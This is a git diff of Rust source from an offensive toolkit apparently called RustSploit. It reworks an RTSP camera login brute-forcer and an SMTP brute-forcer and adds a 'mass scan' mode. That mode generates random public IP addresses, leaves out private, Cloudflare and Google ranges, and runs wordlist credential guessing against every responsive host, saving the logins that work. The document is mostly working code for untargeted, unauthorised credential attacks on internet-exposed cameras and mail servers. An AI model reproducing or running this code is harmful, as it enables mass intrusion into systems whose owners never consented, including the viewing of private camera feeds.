if stop_flag && stop_clone.load(Ordering::Relaxed) {
return;
}
if stop_flag && stop_clone.load(Ordering::Relaxed) { return; }
let permit = match semaphore_clone.acquire_owned().await {
Ok(permit) => permit,
Err(_) => return,
};
if stop_flag && stop_clone.load(Ordering::Relaxed) {
if stop_flag && stop_clone.load(Ordering::Relaxed) {
drop(permit);
return;
return;
}
match try_rtsp_login(
@@ -269,29 +234,24 @@ pub async fn run(target: &str) -> Result<()> {
&path_clone,
command.as_deref(),
&headers,
)
.await
{
).await {
Ok(true) => {
let path_str = if path_clone.is_empty() { "NO_PATH" } else { &path_clone };
println!("\r{}", format!("[+] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_str).green().bold());
found_clone
.lock()
.await
.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone(), path_str.to_string()));
stats_clone.record_attempt(true, false);
found_clone.lock().await.push((addr_clone.clone(), user_clone.clone(), pass_clone.clone(), path_str.to_string()));
stats_clone.record_success();
if stop_flag {
stop_clone.store(true, Ordering::Relaxed);
}
}
Ok(false) => {
stats_clone.record_attempt(false, false);
stats_clone.record_failure();
if verbose_flag {
println!("\r{}", format!("[-] {} -> {}:{} [path={}]", addr_clone, user_clone, pass_clone, path_clone).dimmed());
}
}
Err(e) => {
stats_clone.record_attempt(false, true);
stats_clone.record_error(e.to_string()).await;
if verbose_flag {
println!("\r{}", format!("[!] {} -> error: {}", addr_clone, e).red());
}
@@ -301,24 +261,15 @@ pub async fn run(target: &str) -> Result<()> {
drop(permit);
sleep(Duration::from_millis(10)).await;
}));
if tasks.len() >= concurrency {
if let Some(res) = tasks.next().await {
if let Err(e) = res {
log(verbose, &format!("[!] Task join error: {}", e));
}
}
}
}
}
idx += 1;
}
while let Some(res) = tasks.next().await {
if let Err(e) = res {
if verbose {
println!("\r{}", format!("[!] Task join error: {}", e).red());
stats.record_error(format!("Task panic: {}", e)).await;
}
}
}
@@ -328,7 +279,7 @@ pub async fn run(target: &str) -> Result<()> {
let _ = progress_handle.await;
// Print final statistics
stats.print_final();
stats.print_final().await;
let creds = found.lock().await;
if creds.is_empty() {
@@ -341,17 +292,294 @@ pub async fn run(target: &str) -> Result<()> {
if let Some(path) = save_path {
let filename = get_filename_in_current_dir(&path);
let mut file = File::create(&filename)?;
for (host, user, pass, path) in creds.iter() {
writeln!(file, "{} -> {}:{} [path={}]", host, user, pass, path)?;
if let Ok(mut file) = File::create(&filename) {
for (host, user, pass, path) in creds.iter() {
let _ = writeln!(file, "{} -> {}:{} [path={}]", host, user, pass, path);
}
println!("[+] Results saved to '{}'", filename.display());
}
println!("[+] Results saved to '{}'", filename.display());
}
}
Ok(())
}
/// Run mass scan logic (Hose style)
async fn run_mass_scan(target: &str) -> Result<()> {
// Prep wordlists
println!("{}", "[*] Preparing Mass Scan configuration...".blue());
let port: u16 = prompt_port("RTSP Port", 554)?;
let usernames_file = prompt_wordlist("Username wordlist")?;
let passwords_file = prompt_wordlist("Password wordlist")?;
let paths_file = prompt_wordlist("RTSP paths file (empty for none/root)")?;
let users = load_lines(&usernames_file)?;
let pass_lines = load_lines(&passwords_file)?;
let mut paths = load_lines(&paths_file)?;
if paths.is_empty() {
paths.push("".to_string());
}
if users.is_empty() || pass_lines.is_empty() {
return Err(anyhow!("Wordlists cannot be empty"));
}
let concurrency = prompt_int_range("Max concurrent hosts to scan", 500, 1, 10000)? as usize;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let output_file = prompt_default("Output result file", "rtsp_mass_results.txt")?;
// Parse exclusions
let mut exclusion_subnets = Vec::new();
for cidr in EXCLUDED_RANGES {
if let Ok(net) = cidr.parse::<ipnetwork::IpNetwork>() {
exclusion_subnets.push(net);
}
}
let exclusions = Arc::new(exclusion_subnets);
// Shared State
let semaphore = Arc::new(Semaphore::new(concurrency));
let stats_checked = Arc::new(AtomicUsize::new(0));
let stats_found = Arc::new(AtomicUsize::new(0));
let creds_pkg = Arc::new((users, pass_lines, paths));
// Stats Reporter
let s_checked = stats_checked.clone();
let s_found = stats_found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(5)).await;
println!(
"[*] Status: {} IPs scanned, {} RTSP streams found",
s_checked.load(Ordering::Relaxed),
s_found.load(Ordering::Relaxed).to_string().green().bold()
);
}
});
let run_random = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0";
if run_random {
println!("{}", "[*] Starting Random Internet Scan...".green());
loop {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let exc = exclusions.clone();
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
// Deduplication check
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
} else {
// File Mode
let content = tokio::fs::read_to_string(target).await.unwrap_or_default();
let lines: Vec<String> = content.lines().map(|s| s.trim().to_string()).filter(|s| !s.is_empty()).collect();
println!("{}", format!("[*] Loaded {} targets from file.", lines.len()).blue());
for ip_str in lines {
let permit = semaphore.clone().acquire_owned().await.map_err(|e| anyhow::anyhow!("Semaphore closed: {}", e))?;
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
// Try parse IP, or resolve? For mass scan usually IP lists. We'll try resolve if parsing fails.
// But to keep it simple and aligned with "hose" logic which normally takes IPs:
let ip_addr = match ip_str.parse::<IpAddr>() {
Ok(ip) => Some(ip),
Err(_) => {
// Try resolve
match tokio::net::lookup_host(format!("{}:{}", ip_str, port)).await {
Ok(mut iter) => iter.next().map(|s| s.ip()),
Err(_) => None
}
}
};
tokio::spawn(async move {
if let Some(ip) = ip_addr {
if !is_ip_checked(&ip).await {
mark_ip_checked(&ip).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
// Wait for finish
for _ in 0..concurrency {
let _ = semaphore.acquire().await.context("Semaphore acquisition failed")?;
}
}
Ok(())
}
async fn mass_scan_host(
ip: IpAddr,
port: u16,
creds: Arc<(Vec<String>, Vec<String>, Vec<String>)>,
stats_found: Arc<AtomicUsize>,
output_file: String,
verbose: bool
) {
let sa = SocketAddr::new(ip, port);
// 1. Connection Check (Fast Fail)
if timeout(Duration::from_millis(MASS_SCAN_CONNECT_TIMEOUT_MS), TcpStream::connect(&sa)).await.is_err() {
return;
}
// 2. Bruteforce
let (users, passes, paths) = &*creds;
// Helper to cleanup repetitive calls
// We iterate: Path -> User -> Pass ? Or User -> Pass -> Path?
// RTSP paths are important. Often root works.
for path in paths {
for user in users {
for pass in passes {
// We use the existing try_rtsp_login.
// It does re-connect, which is not optimal but robust.
let addrs = [sa];
let empty_headers: Vec<String> = Vec::new();
// For mass scan, we assume standard DESCRIBE or OPTIONS is fine.
// try_rtsp_login defaults to OPTIONS if None, let's use DESCRIBE if we want to check stream?
// Actually existing tool defaults to OPTIONS unless advanced is on. OPTIONS is auth-less often?
// No, OPTIONS usually requires auth if server is secure.
let res = try_rtsp_login(
&addrs,
&sa.to_string(),
user,
pass,
path,
Some("DESCRIBE"), // Use DESCRIBE to be sure we can access stream info
&empty_headers
).await;
match res {
Ok(true) => {
// Success!
let result_str = format!("{} -> {}:{} [path={}]", sa, user, pass, path);
println!("\r{}", format!("[+] FOUND: {}", result_str).green().bold());
// Save
if let Ok(mut file) = OpenOptions::new().create(true).append(true).open(&output_file).await {
let _ = file.write_all(format!("{}\n", result_str).as_bytes()).await;
}
stats_found.fetch_add(1, Ordering::Relaxed);
return; // Stop scanning this host on found
}
Ok(false) => {
// Auth failure
}
Err(e) => {
// Connection error or protocol error
if verbose {
// Only print verbose errors if really needed, prevents spam
}
// If connection failed (rst/timeout), often no point trying other creds?
// But existing function returns Err on IO error.
// We should probably stop trying this host if we get Refused/Timeout inside loop?
let err_str = e.to_string().to_lowercase();
if err_str.contains("refused") || err_str.contains("timeout") || err_str.contains("reset") {
return; // Host dead or blocking us
}
}
}
// Small sleep to be polite?
// sleep(Duration::from_millis(50)).await;
}
}
}
}
fn generate_random_public_ip(exclusions: &[ipnetwork::IpNetwork]) -> IpAddr {
let mut rng = rand::rng();
loop {
let octets: [u8; 4] = rng.random();
let ip = Ipv4Addr::from(octets);
let ip_addr = IpAddr::V4(ip);
let mut excluded = false;
for net in exclusions {
if net.contains(ip_addr) {
excluded = true;
break;
}
}
if !excluded {
return ip_addr;
}
}
}
async fn is_ip_checked(ip: &impl ToString) -> bool {
// Ensure state file exists before running grep
if !std::path::Path::new(STATE_FILE).exists() {
// Create empty state file to avoid grep errors
if let Ok(mut file) = OpenOptions::new()
.create(true)
.write(true)
.open(STATE_FILE)
.await
{
let _ = file.flush().await;
}
return false; // File was just created, IP definitely not checked
}
let ip_s = ip.to_string();
let status = Command::new("grep")
.arg("-F")
.arg("-q")
.arg(format!("checked: {}", ip_s))
.arg(STATE_FILE)
.status()
.await;
match status {
Ok(s) => s.success(),
Err(_) => false,
}
}
async fn mark_ip_checked(ip: &impl ToString) {
let data = format!("checked: {}\n", ip.to_string());
if let Ok(mut file) = OpenOptions::new()
.create(true)
.append(true)
.open(STATE_FILE)
.await
{
let _ = file.write_all(data.as_bytes()).await;
}
}
/// Resolve a host:port (literal v4/v6 or DNS) into all possible SocketAddrs.
async fn resolve_targets(addr: &str) -> Result<Vec<SocketAddr>> {
// 1) If it's a literal SocketAddr, return it directly
@@ -403,16 +631,20 @@ async fn try_rtsp_login(
// Try each candidate address
for sa in addrs {
match TcpStream::connect(*sa).await {
Ok(s) => {
match timeout(Duration::from_millis(MASS_SCAN_CONNECT_TIMEOUT_MS), TcpStream::connect(*sa)).await {
Ok(Ok(s)) => {
stream = Some(s);
connected_sa = Some(*sa);
break;
}
Err(e) => {
Ok(Err(e)) => {
last_err = Some(e);
continue;
}
Err(_) => {
last_err = Some(std::io::Error::new(std::io::ErrorKind::TimedOut, "Connect timeout"));
continue;
}
}
}
@@ -458,7 +690,13 @@ async fn try_rtsp_login(
stream.write_all(request.as_bytes()).await?;
let mut buffer = [0u8; 2048];
let n = stream.read(&mut buffer).await?;
// Add Read timeout
let n = match timeout(Duration::from_millis(MASS_SCAN_CONNECT_TIMEOUT_MS), stream.read(&mut buffer)).await {
Ok(Ok(n)) => n,
Ok(Err(e)) => return Err(e.into()),
Err(_) => return Err(anyhow!("Read timeout")),
};
if n == 0 {
return Err(anyhow!("{}: server closed connection unexpectedly.", addr_display));
}
@@ -469,154 +707,42 @@ async fn try_rtsp_login(
} else if response.contains("401") || response.contains("403") {
Ok(false)
} else {
Err(anyhow!("{}: unexpected RTSP response:\n{}", addr_display, response))
// Some cameras might return 404 if path is wrong but still authorized?
// Or 400 Bad Request?
// Safest is to treat anything not 200 as fail, but maybe check for specifc auth fail codes.
// If we get 404, the creds might be valid but path invalid.
// But without positive valid signal, we assume fail.
Err(anyhow!("{}: unexpected RTSP response: {}", addr_display, response.lines().next().unwrap_or("")))
}
}
fn normalize_target_input(target: &str, default_port: u16) -> Result<(String, Option<String>)> {
/// Extract RTSP path from target string (e.g., rtsp://host:port/path -> Some("/path"))
/// Returns None if no path is present or if path is just "/"
fn extract_rtsp_path(target: &str) -> Option<String> {
let trimmed = target.trim();
if trimmed.is_empty() {
return Err(anyhow!("Target cannot be empty."));
}
// Remove rtsp:// scheme if present
let without_scheme = trimmed.strip_prefix("rtsp://").unwrap_or(trimmed);
let (host_part, path_part) = if let Some((host, path)) = without_scheme.split_once('/') {
(host.trim(), Some(path.to_string()))
} else {
(without_scheme.trim(), None)
};
if host_part.is_empty() {
return Err(anyhow!("Target host cannot be empty."));
}
let normalized_host = if host_part.starts_with('[') {
if host_part.contains("]:") {
host_part.to_string()
} else {
format!("{}:{}", host_part, default_port)
}
} else {
let colon_count = host_part.matches(':').count();
if colon_count == 0 {
format!("{}:{}", host_part, default_port)
} else if colon_count == 1 {
if let Some((host_only, port_str)) = host_part.rsplit_once(':') {
if port_str.parse::<u16>().is_ok() {
if host_only.contains(':') {
format!("[{}]:{}", host_only, port_str)
} else {
host_part.to_string()
}
} else {
format!("{}:{}", host_part, default_port)
}
} else {
format!("{}:{}", host_part, default_port)
}
} else {
format!("[{}]:{}", host_part, default_port)
}
};
let normalized_path = path_part.and_then(|p| {
let truncated = p.split(|c| c == '?' || c == '#').next().unwrap_or_default();
let trimmed = truncated.trim();
if trimmed.is_empty() || trimmed == "/" {
// Split on first '/' to separate host:port from path
if let Some((_, path)) = without_scheme.split_once('/') {
// Remove query strings and fragments
let clean_path = path.split(|c| c == '?' || c == '#')
.next()
.unwrap_or_default()
.trim();
if clean_path.is_empty() || clean_path == "/" {
None
} else {
let mut path = trimmed.to_string();
if !path.starts_with('/') {
path.insert(0, '/');
// Ensure path starts with '/'
let mut final_path = clean_path.to_string();
if !final_path.starts_with('/') {
final_path.insert(0, '/');
}
Some(path)
Some(final_path)
}
});
Ok((normalized_host, normalized_path))
}
// ─── Prompt and utility functions unchanged ───────────────────────────────────
async fn prompt_required(msg: &str) -> Result<String> {
loop {
print!("{}", format!("{}: ", msg).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
if !trimmed.is_empty() {
return Ok(trimmed.to_string());
}
println!("{}", "This field is required.".yellow());
} else {
None
}
}
async fn prompt_default(msg: &str, default: &str) -> Result<String> {
print!("{}", format!("{} [{}]: ", msg, default).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
let trimmed = s.trim();
Ok(if trimmed.is_empty() { default.to_string() } else { trimmed.to_string() })
}
async fn prompt_yes_no(msg: &str, default_yes: bool) -> Result<bool> {
let default = if default_yes { "y" } else { "n" };
loop {
print!("{}", format!("{} (y/n) [{}]: ", msg, default).cyan().bold());
tokio::io::stdout()
.flush()
.await
.context("Failed to flush stdout")?;
let mut s = String::new();
tokio::io::BufReader::new(tokio::io::stdin())
.read_line(&mut s)
.await
.context("Failed to read input")?;
match s.trim().to_lowercase().as_str() {
"" => return Ok(default_yes),
"y" | "yes" => return Ok(true),
"n" | "no" => return Ok(false),
_ => println!("{}", "Invalid input. Please enter 'y' or 'n'.".yellow()),
}
}
}
fn load_lines<P: AsRef<Path>>(path: P) -> Result<Vec<String>> {
let file = File::open(path)?;
let reader = BufReader::new(file);
Ok(reader
.lines()
.filter_map(Result::ok)
.map(|l| l.trim().to_string())
.filter(|l| !l.is_empty())
.collect())
}
fn log(verbose: bool, msg: &str) {
if verbose {
println!("{}", msg);
}
}
fn get_filename_in_current_dir(input: &str) -> PathBuf {
let name = Path::new(input)
.file_name()
.unwrap_or_default()
.to_string_lossy()
.to_string();
PathBuf::from(format!("./{}", name))
}
+394 -381
View File
@@ -1,97 +1,42 @@
use anyhow::{anyhow, Context, Result};
use colored::*;
use regex::Regex;
use std::fs::{File, OpenOptions};
use std::io::{BufRead, BufReader, Write};
use tokio::io::{AsyncBufReadExt, AsyncWriteExt};
use std::net::{TcpStream, ToSocketAddrs};
use std::path::Path;
use std::sync::{Arc, Mutex};
use std::sync::atomic::{AtomicBool, AtomicU64, Ordering};
use std::time::{Duration, Instant};
use std::net::{ToSocketAddrs, IpAddr, SocketAddr};
use std::net::TcpStream;
use std::sync::{
atomic::{AtomicBool, AtomicUsize, Ordering},
Arc,
};
use std::time::Duration;
use tokio::sync::{Mutex, Semaphore};
use futures::stream::{FuturesUnordered, StreamExt};
use telnet::{Telnet, Event};
use threadpool::ThreadPool;
use crossbeam_channel::unbounded;
use base64::{engine::general_purpose, Engine as _};
use tokio::io::AsyncWriteExt;
use tokio::fs::OpenOptions;
const PROGRESS_INTERVAL_SECS: u64 = 2;
use crate::utils::{
prompt_yes_no, prompt_existing_file, prompt_int_range,
load_lines, prompt_default, prompt_wordlist,
};
use crate::modules::creds::utils::{BruteforceStats, generate_random_public_ip, is_ip_checked, mark_ip_checked, parse_exclusions};
struct Statistics {
total_attempts: AtomicU64,
successful_attempts: AtomicU64,
failed_attempts: AtomicU64,
error_attempts: AtomicU64,
start_time: Instant,
}
const STATE_FILE: &str = "smtp_hose_state.log";
const MASS_SCAN_CONNECT_TIMEOUT_MS: u64 = 3000;
impl Statistics {
fn new() -> Self {
Self {
total_attempts: AtomicU64::new(0),
successful_attempts: AtomicU64::new(0),
failed_attempts: AtomicU64::new(0),
error_attempts: AtomicU64::new(0),
start_time: Instant::now(),
}
}
fn record_attempt(&self, success: bool, error: bool) {
self.total_attempts.fetch_add(1, Ordering::Relaxed);
if error {
self.error_attempts.fetch_add(1, Ordering::Relaxed);
} else if success {
self.successful_attempts.fetch_add(1, Ordering::Relaxed);
} else {
self.failed_attempts.fetch_add(1, Ordering::Relaxed);
}
}
fn print_progress(&self) {
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
let rate = if elapsed > 0.0 { total as f64 / elapsed } else { 0.0 };
print!(
"\r{} {} attempts | {} OK | {} fail | {} err | {:.1}/s ",
"[Progress]".cyan(),
total.to_string().bold(),
success.to_string().green(),
failed,
errors.to_string().red(),
rate
);
let _ = std::io::Write::flush(&mut std::io::stdout());
}
fn print_final(&self) {
println!();
let total = self.total_attempts.load(Ordering::Relaxed);
let success = self.successful_attempts.load(Ordering::Relaxed);
let failed = self.failed_attempts.load(Ordering::Relaxed);
let errors = self.error_attempts.load(Ordering::Relaxed);
let elapsed = self.start_time.elapsed().as_secs_f64();
println!("{}", "=== Statistics ===".bold());
println!(" Total attempts: {}", total);
println!(" Successful: {}", success.to_string().green().bold());
println!(" Failed: {}", failed);
println!(" Errors: {}", errors.to_string().red());
println!(" Elapsed time: {:.2}s", elapsed);
if elapsed > 0.0 {
println!(" Average rate: {:.1} attempts/s", total as f64 / elapsed);
}
}
}
fn display_banner() {
println!("{}", "╔═══════════════════════════════════════════════════════════╗".cyan());
println!("{}", "║ SMTP Brute Force Module ║".cyan());
println!("{}", "║ Supports AUTH PLAIN and AUTH LOGIN ║".cyan());
println!("{}", "╚═══════════════════════════════════════════════════════════╝".cyan());
println!();
}
// Hardcoded exclusions
const EXCLUDED_RANGES: &[&str] = &[
"10.0.0.0/8", "127.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
"224.0.0.0/4", "240.0.0.0/4", "0.0.0.0/8",
"100.64.0.0/10", "169.254.0.0/16", "255.255.255.255/32",
// Cloudflare
"103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22", "104.16.0.0/13",
"104.24.0.0/14", "108.162.192.0/18", "131.0.72.0/22", "141.101.64.0/18",
"162.158.0.0/15", "172.64.0.0/13", "173.245.48.0/20", "188.114.96.0/20",
"190.93.240.0/20", "197.234.240.0/22", "198.41.128.0/17",
"1.1.1.1/32", "1.0.0.1/32",
// Google
"8.8.8.8/32", "8.8.4.4/32"
];
#[derive(Clone)]
struct SmtpBruteforceConfig {
@@ -103,19 +48,37 @@ struct SmtpBruteforceConfig {
stop_on_success: bool,
verbose: bool,
full_combo: bool,
output_file: String,
delay_ms: u64,
}
pub async fn run(target: &str) -> Result<()> {
display_banner();
println!("{}", format!("[*] Target: {}", target).cyan());
println!("\n{}", "=== SMTP Bruteforce Module (RustSploit) ===".bold().cyan());
println!();
let port = prompt_port(25).await?;
let username_wordlist = prompt_wordlist("Username wordlist file: ").await?;
let password_wordlist = prompt_wordlist("Password wordlist file: ").await?;
let threads = prompt_threads(8).await?;
let stop_on_success = prompt_yes_no("Stop on first valid login?", true).await?;
let full_combo = prompt_yes_no("Try every username with every password?", false).await?;
let verbose = prompt_yes_no("Verbose mode?", false).await?;
// Check for Mass Scan Mode conditions
let is_mass_scan = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0" || std::path::Path::new(target).is_file();
if is_mass_scan {
println!("{}", format!("[*] Target: {}", target).cyan());
println!("{}", "[*] Mode: Mass Scan / Hose".yellow());
return run_mass_scan(target).await;
}
// --- Standard Single Target Logic ---
let port = prompt_int_range("Port", 25, 1, 65535)? as u16;
let username_wordlist = prompt_existing_file("Username wordlist file")?;
let password_wordlist = prompt_existing_file("Password wordlist file")?;
let threads = prompt_int_range("Threads", 8, 1, 256)? as usize;
let delay_ms = prompt_int_range("Delay (ms)", 50, 0, 10000)? as u64;
let stop_on_success = prompt_yes_no("Stop on first valid login?", true)?;
let full_combo = prompt_yes_no("Try every username with every password?", false)?;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let output_file = prompt_default("Output file for results", "smtp_results.txt")?;
let config = SmtpBruteforceConfig {
target: target.to_string(),
port,
@@ -125,358 +88,408 @@ pub async fn run(target: &str) -> Result<()> {
stop_on_success,
verbose,
full_combo,
output_file,
delay_ms,
};
println!();
run_smtp_bruteforce(config).await
}
async fn run_smtp_bruteforce(config: SmtpBruteforceConfig) -> Result<()> {
let addr = normalize_target(&config.target, config.port)?;
let usernames = read_lines(&config.username_wordlist)?;
let passwords = read_lines(&config.password_wordlist)?;
if usernames.is_empty() || passwords.is_empty() {
return Err(anyhow!("Username or password wordlist is empty."));
}
println!("{}", format!("[*] Loaded {} username(s).", usernames.len()).cyan());
println!("{}", format!("[*] Loaded {} password(s).", passwords.len()).cyan());
async fn run_mass_scan(target: &str) -> Result<()> {
// Prep
let port = prompt_int_range("Port", 25, 1, 65535)? as u16;
let usernames_file = prompt_wordlist("Username wordlist")?;
let passwords_file = prompt_wordlist("Password wordlist")?;
let total_attempts = if config.full_combo {
usernames.len() * passwords.len()
} else {
passwords.len()
};
println!("{}", format!("[*] Total attempts: {}", total_attempts).cyan());
println!();
let found = Arc::new(Mutex::new(Vec::new()));
let unknown = Arc::new(Mutex::new(Vec::new()));
let stop_flag = Arc::new(AtomicBool::new(false));
let stats = Arc::new(Statistics::new());
let pool = ThreadPool::new(config.threads);
let (tx, rx) = unbounded();
if config.full_combo {
for u in &usernames { for p in &passwords { tx.send((u.clone(), p.clone()))?; } }
} else if usernames.len() == 1 {
for p in &passwords { tx.send((usernames[0].clone(), p.clone()))?; }
} else if passwords.len() == 1 {
for u in &usernames { tx.send((u.clone(), passwords[0].clone()))?; }
} else {
for p in &passwords { tx.send((usernames[0].clone(), p.clone()))?; }
}
drop(tx);
// Start progress reporter thread
let progress_stop = Arc::clone(&stop_flag);
let progress_stats = Arc::clone(&stats);
let progress_handle = std::thread::spawn(move || {
while !progress_stop.load(Ordering::Relaxed) {
progress_stats.print_progress();
std::thread::sleep(Duration::from_secs(PROGRESS_INTERVAL_SECS));
let users = load_lines(&usernames_file)?;
let pass_lines = load_lines(&passwords_file)?;
if users.is_empty() { return Err(anyhow!("User list empty")); }
if pass_lines.is_empty() { return Err(anyhow!("Pass list empty")); }
let concurrency = prompt_int_range("Max concurrent hosts to scan", 500, 1, 10000)? as usize;
let verbose = prompt_yes_no("Verbose mode?", false)?;
let output_file = prompt_default("Output result file", "smtp_mass_results.txt")?;
// Parse exclusions
let exclusions = Arc::new(parse_exclusions(EXCLUDED_RANGES));
let semaphore = Arc::new(Semaphore::new(concurrency));
let stats_checked = Arc::new(AtomicUsize::new(0));
let stats_found = Arc::new(AtomicUsize::new(0));
let creds_pkg = Arc::new((users, pass_lines));
// Stats
let s_checked = stats_checked.clone();
let s_found = stats_found.clone();
tokio::spawn(async move {
loop {
tokio::time::sleep(Duration::from_secs(5)).await;
println!(
"[*] Status: {} IPs scanned, {} valid SMTP credentials found",
s_checked.load(Ordering::Relaxed),
s_found.load(Ordering::Relaxed).to_string().green().bold()
);
}
});
let run_random = target == "random" || target == "0.0.0.0" || target == "0.0.0.0/0";
if run_random {
println!("{}", "[*] Starting Random Internet Scan...".green());
loop {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let exc = exclusions.clone();
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
tokio::spawn(async move {
let ip = generate_random_public_ip(&exc);
if !is_ip_checked(&ip, STATE_FILE).await {
mark_ip_checked(&ip, STATE_FILE).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
}
} else {
// File Mode
let content = tokio::fs::read_to_string(target).await.unwrap_or_default();
let lines: Vec<String> = content.lines().map(|s| s.trim().to_string()).filter(|s| !s.is_empty()).collect();
println!("{}", format!("[*] Loaded {} targets from file.", lines.len()).blue());
for ip_str in lines {
let permit = semaphore.clone().acquire_owned().await.context("Semaphore acquisition failed")?;
let cp = creds_pkg.clone();
let sc = stats_checked.clone();
let sf = stats_found.clone();
let of = output_file.clone();
if let Ok(ip) = ip_str.parse::<IpAddr>() {
tokio::spawn(async move {
if !is_ip_checked(&ip, STATE_FILE).await {
mark_ip_checked(&ip, STATE_FILE).await;
mass_scan_host(ip, port, cp, sf, of, verbose).await;
}
sc.fetch_add(1, Ordering::Relaxed);
drop(permit);
});
} else {
drop(permit);
}
}
for _ in 0..concurrency {
let _ = semaphore.acquire().await.context("Semaphore acquisition failed")?;
}
}
for _ in 0..config.threads {
let rx = rx.clone();
let addr = addr.clone();
let stop_flag = Arc::clone(&stop_flag);
let found = Arc::clone(&found);
let unknown = Arc::clone(&unknown);
let stats = Arc::clone(&stats);
let config = config.clone();
pool.execute(move || {
while let Ok((user, pass)) = rx.recv() {
if stop_flag.load(Ordering::Relaxed) { break; }
match try_smtp_login(&addr, &user, &pass) {
Ok(true) => {
println!("\r{}", format!("[+] VALID: {}:{}", user, pass).green().bold());
let mut creds = found.lock().unwrap(); creds.push((user.clone(), pass.clone()));
stats.record_attempt(true, false);
if config.stop_on_success {
stop_flag.store(true, Ordering::Relaxed);
while rx.try_recv().is_ok() {}
break;
}
Ok(())
}
async fn mass_scan_host(
ip: IpAddr,
port: u16,
creds: Arc<(Vec<String>, Vec<String>)>,
stats_found: Arc<AtomicUsize>,
output_file: String,
verbose: bool
) {
let sa = SocketAddr::new(ip, port);
// 1. Connection Check
if tokio::time::timeout(Duration::from_millis(MASS_SCAN_CONNECT_TIMEOUT_MS), tokio::net::TcpStream::connect(&sa)).await.is_err() {
return;
}
let (users, passes) = &*creds;
// 2. Bruteforce
// Reuse existing blocking sync function inside spawn_blocking?
// The existing function uses std::net::TcpStream blocking.
// That's fine for small lists, but suboptimal for high concurrency.
// However, since we are inside a spawned tokio task, spawn_blocking is appropriate.
let target_str = ip.to_string();
for user in users {
for pass in passes {
let t_target = target_str.clone();
let t_user = user.clone();
let t_pass = pass.clone();
let t_port = port;
let t_target_inner = t_target.clone();
let t_user_inner = t_user.clone();
let t_pass_inner = t_pass.clone();
// Blocking call for the actual SMTP interaction (since it uses blocking Telnet/TcpStream)
let res = tokio::task::spawn_blocking(move || {
try_smtp_login(&t_target_inner, t_port, &t_user_inner, &t_pass_inner)
}).await;
match res {
Ok(Ok(true)) => {
let msg = format!("{} -> {}:{}", t_target, t_user, t_pass);
println!("\r{}", format!("[+] FOUND: {}", msg).green().bold());
if let Ok(mut file) = OpenOptions::new().create(true).append(true).open(&output_file).await {
let _ = file.write_all(format!("{}\n", msg).as_bytes()).await;
}
Ok(false) => {
stats.record_attempt(false, false);
if config.verbose {
println!("\r{}", format!("[-] Failed: {}:{}", user, pass).dimmed());
}
}
Err(e) => {
stats.record_attempt(false, true);
let msg = e.to_string();
{
let mut unk = unknown.lock().unwrap();
unk.push((user.clone(), pass.clone(), msg.clone()));
}
if config.verbose {
eprintln!("\r{}", format!("[?] {}:{} -> {}", user, pass, msg).yellow());
}
stats_found.fetch_add(1, Ordering::Relaxed);
return; // Stop after first success
}
Ok(Ok(false)) => {
if verbose {
// Auth failed
}
}
}
});
}
pool.join();
// Stop progress reporter
stop_flag.store(true, Ordering::Relaxed);
let _ = progress_handle.join();
// Print final statistics
stats.print_final();
let found_guard = found.lock().unwrap();
if found_guard.is_empty() {
println!("{}", "[-] No valid credentials found.".yellow());
} else {
println!("{}", format!("[+] Found {} valid credential(s):", found_guard.len()).green().bold());
for (u,p) in found_guard.iter() { println!(" {} {}:{}", "".green(), u, p); }
if prompt("\nSave found credentials? (y/n): ").await?.trim().eq_ignore_ascii_case("y") {
let f = prompt("What should the valid results be saved as?: ").await?;
if !f.trim().is_empty() {
save_results(&f, &found_guard)?;
println!("{}", format!("[+] Results saved to {}", f).green());
} else {
println!("{}", "[-] Filename cannot be empty. Skipping save.".yellow());
Ok(Err(e)) => {
// Connection error
let err = e.to_string().to_lowercase();
if err.contains("refused") || err.contains("timeout") || err.contains("reset") {
return; // Stop scanning host
}
}
Err(_) => {
// Start/Join error
}
}
}
}
drop(found_guard);
}
let unknown_guard = unknown.lock().unwrap();
if !unknown_guard.is_empty() {
println!(
"{}",
format!(
"[?] Collected {} unknown/errored SMTP responses.",
unknown_guard.len()
)
.yellow()
.bold()
);
if prompt("Save unknown responses to file? (y/n): ")
.await?
.trim()
.eq_ignore_ascii_case("y")
{
let default_name = "smtp_bruteforce_unknown.txt";
let fname = prompt(&format!(
"What should the unknown results be saved as? [{}]: ",
default_name
)).await?;
let chosen = if fname.trim().is_empty() {
default_name.to_string()
} else {
fname.trim().to_string()
};
if let Err(e) = save_unknown_smtp(&chosen, &unknown_guard) {
